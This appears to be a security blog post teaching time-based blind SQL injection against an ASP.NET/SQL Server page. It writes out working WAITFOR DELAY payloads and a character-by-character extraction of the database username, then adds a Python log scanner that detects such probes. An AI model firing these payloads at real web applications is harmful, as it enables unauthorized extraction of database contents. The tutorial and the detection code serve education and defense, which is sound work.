Hello guys... sorry for the time lapse between posts...
Today I'm going to discuss time based SQL injection. You might have heard of error based SQL injection, which occurs due to improper input validation on the server side. Time based SQL injection is a category of SQL injection that does not show any error messages, so exploiting a time based SQL injection is often a tedious job.
Detection of Time based SQL Injection
During a manual web security assessment it was observed that an application was vulnerable to time based SQL injection. Often people (web admins) do not take it seriously and ignore such vulnerabilities, reasoning that they do not reveal their data, but they can also be exploited to gain remote database information.
For example, take an application which generates a parameter xyz=<some id> in response to a request made to the web application. A time based SQL payload can be injected into the parameter in the following manner:
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27 waitfor delay '0:0:10'--
The application responded in 13.87 sec.
Another payload can be injected in a similar manner to confirm the detection of SQL injection:
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27 waitfor delay '0:0:20'--
This time the application responded in 24 sec.
Now a third payload is injected to confirm that the result is not a false positive:
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27 waitfor delay '0:0:30'--
The application responded in 34 sec.
Therefore it is quite certain that we are able to control the application's behaviour and that our query waitfor delay '0:0:20' is actually executing on the server side. This confirms the presence of time based SQL injection.
Exploitation
Now it is time to exploit the vulnerability to obtain some useful information.
The basic idea behind exploiting this vulnerability is to ask the database a series of true/false questions and, on the basis of its response, guess values character by character. This is what makes it tedious, but also quite an interesting feature.
To obtain the database user name, we first try to guess the length of the username using the following request to the server:
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27if (len(user)=1)waitfor delay'0%3a0%3a20'--
If the length of user had been 1, the application would have responded in more than 20 sec, but the actual response was received in just 3-4 sec.
Similarly the user length was increased to 2, 3, 4, and so on, and the application responded positively for len=7, which confirms that the database username is 7 characters long:
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27if (len(user)=7)waitfor delay'0%3a0%3a20'--
The application responded in 24.36 sec.
Now it is time to obtain the database username character by character. To obtain the username we need to guess the characters one by one. First we test whether the first character of the database username is lowercase or uppercase, with the following condition:
if (ascii(lower(substring((user),1,1)))>97) WAITFOR DELAY '00:00:10'--
Here 97 is the ASCII value of the character 'a', so from here it is sure that the first character is lowercase.
Now we start testing for the character itself. To do this in fewer iterations we take the ASCII value 113. Again the same query was crafted:
if (ascii(lower(substring((user),1,1)))<113) WAITFOR DELAY '00:00:10'--
The application responded positively, so we know the character lies between 97 and 113.
Now we follow the same strategy to narrow down the range in which the character can occur. Once we have the smallest range, we test for equality:
http://www.vulnerable.com/querysave.aspx?xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733'if (ascii(lower(substring((user),1,1)))=100)waitfor delay '0:0:20'--
The application responded in 25 sec, which gave us the first character of our database user name, i.e. 'a'.
Likewise the second character, and the entire database username, tables and values can be guessed using the strategy defined above and some customized queries, which I leave to you for research.
The database username so obtained was 'admindb'.
Hope you all will benefit from this post.
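From the defender's side, the same timing signal used above for detection and for the true/false extraction oracle shows up in the web server's access log: a request carrying WAITFOR DELAY whose time-taken meets the requested delay is a confirmed execution, and for the conditional if (...) probes the fast/slow split is exactly the answer the server leaked. The following Python is an added example, not code from the original post; the IIS-style log lines, field layout and client address are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log excerpt (not from the original post). Fields:
# time c-ip cs-uri-stem cs-uri-query sc-status time-taken(ms)
SAMPLE_LOG = """\
10:00:01 10.0.0.5 /querysave.aspx xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733 200 120
10:00:05 10.0.0.5 /querysave.aspx xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27%20waitfor%20delay%20%270:0:10%27-- 200 13870
10:00:30 10.0.0.5 /querysave.aspx xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27if%20(len(user)=1)waitfor%20delay%270%3a0%3a20%27-- 200 3400
10:00:59 10.0.0.5 /querysave.aspx xyz=f848cfe6-74d7-4a32-92d7-6c5c16e16733%27if%20(len(user)=7)waitfor%20delay%270%3a0%3a20%27-- 200 24360
"""

# T-SQL WAITFOR DELAY 'h:m:s'; the space before the quote is optional, as in the post.
DELAY_RE = re.compile(r"waitfor\s*delay\s*'(\d+):(\d+):(\d+)'", re.I)
COND_RE = re.compile(r"\bif\s*\(", re.I)  # 'if (...) waitfor' true/false oracle

def requested_delay_seconds(decoded_query):
    """Seconds requested by a WAITFOR DELAY in the URL-decoded query, or None."""
    m = DELAY_RE.search(decoded_query)
    if not m:
        return None
    h, mi, s = (int(x) for x in m.groups())
    return h * 3600 + mi * 60 + s

def classify_line(line):
    """Parse one log line; return a finding dict or None if no WAITFOR probe."""
    parts = line.split()
    if len(parts) < 6:
        return None
    decoded = unquote_plus(parts[3])
    delay = requested_delay_seconds(decoded)
    if delay is None:
        return None
    time_taken_ms = int(parts[5])
    return {
        "client": parts[1],
        "conditional": bool(COND_RE.search(decoded)),
        "requested_s": delay,
        "time_taken_ms": time_taken_ms,
        # The server honouring the requested delay is the signal.
        "executed": time_taken_ms >= delay * 1000,
    }

def scan(log_text):
    """Findings for every WAITFOR probe in the log, in order."""
    return [f for f in map(classify_line, log_text.splitlines()) if f]

def confirmed_injection(findings):
    """True if an unconditional probe's delay was actually executed."""
    return any(f["executed"] and not f["conditional"] for f in findings)

def oracle_answers(findings):
    """Per conditional probe: fast response means the injected condition was
    false, a delayed one means true (the bit the attacker learned)."""
    return [f["executed"] for f in findings if f["conditional"]]
```

A fast response to a conditional probe only means that condition was false, not that the parameter is safe; a run of such probes from one client is the extraction in progress.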
Thanks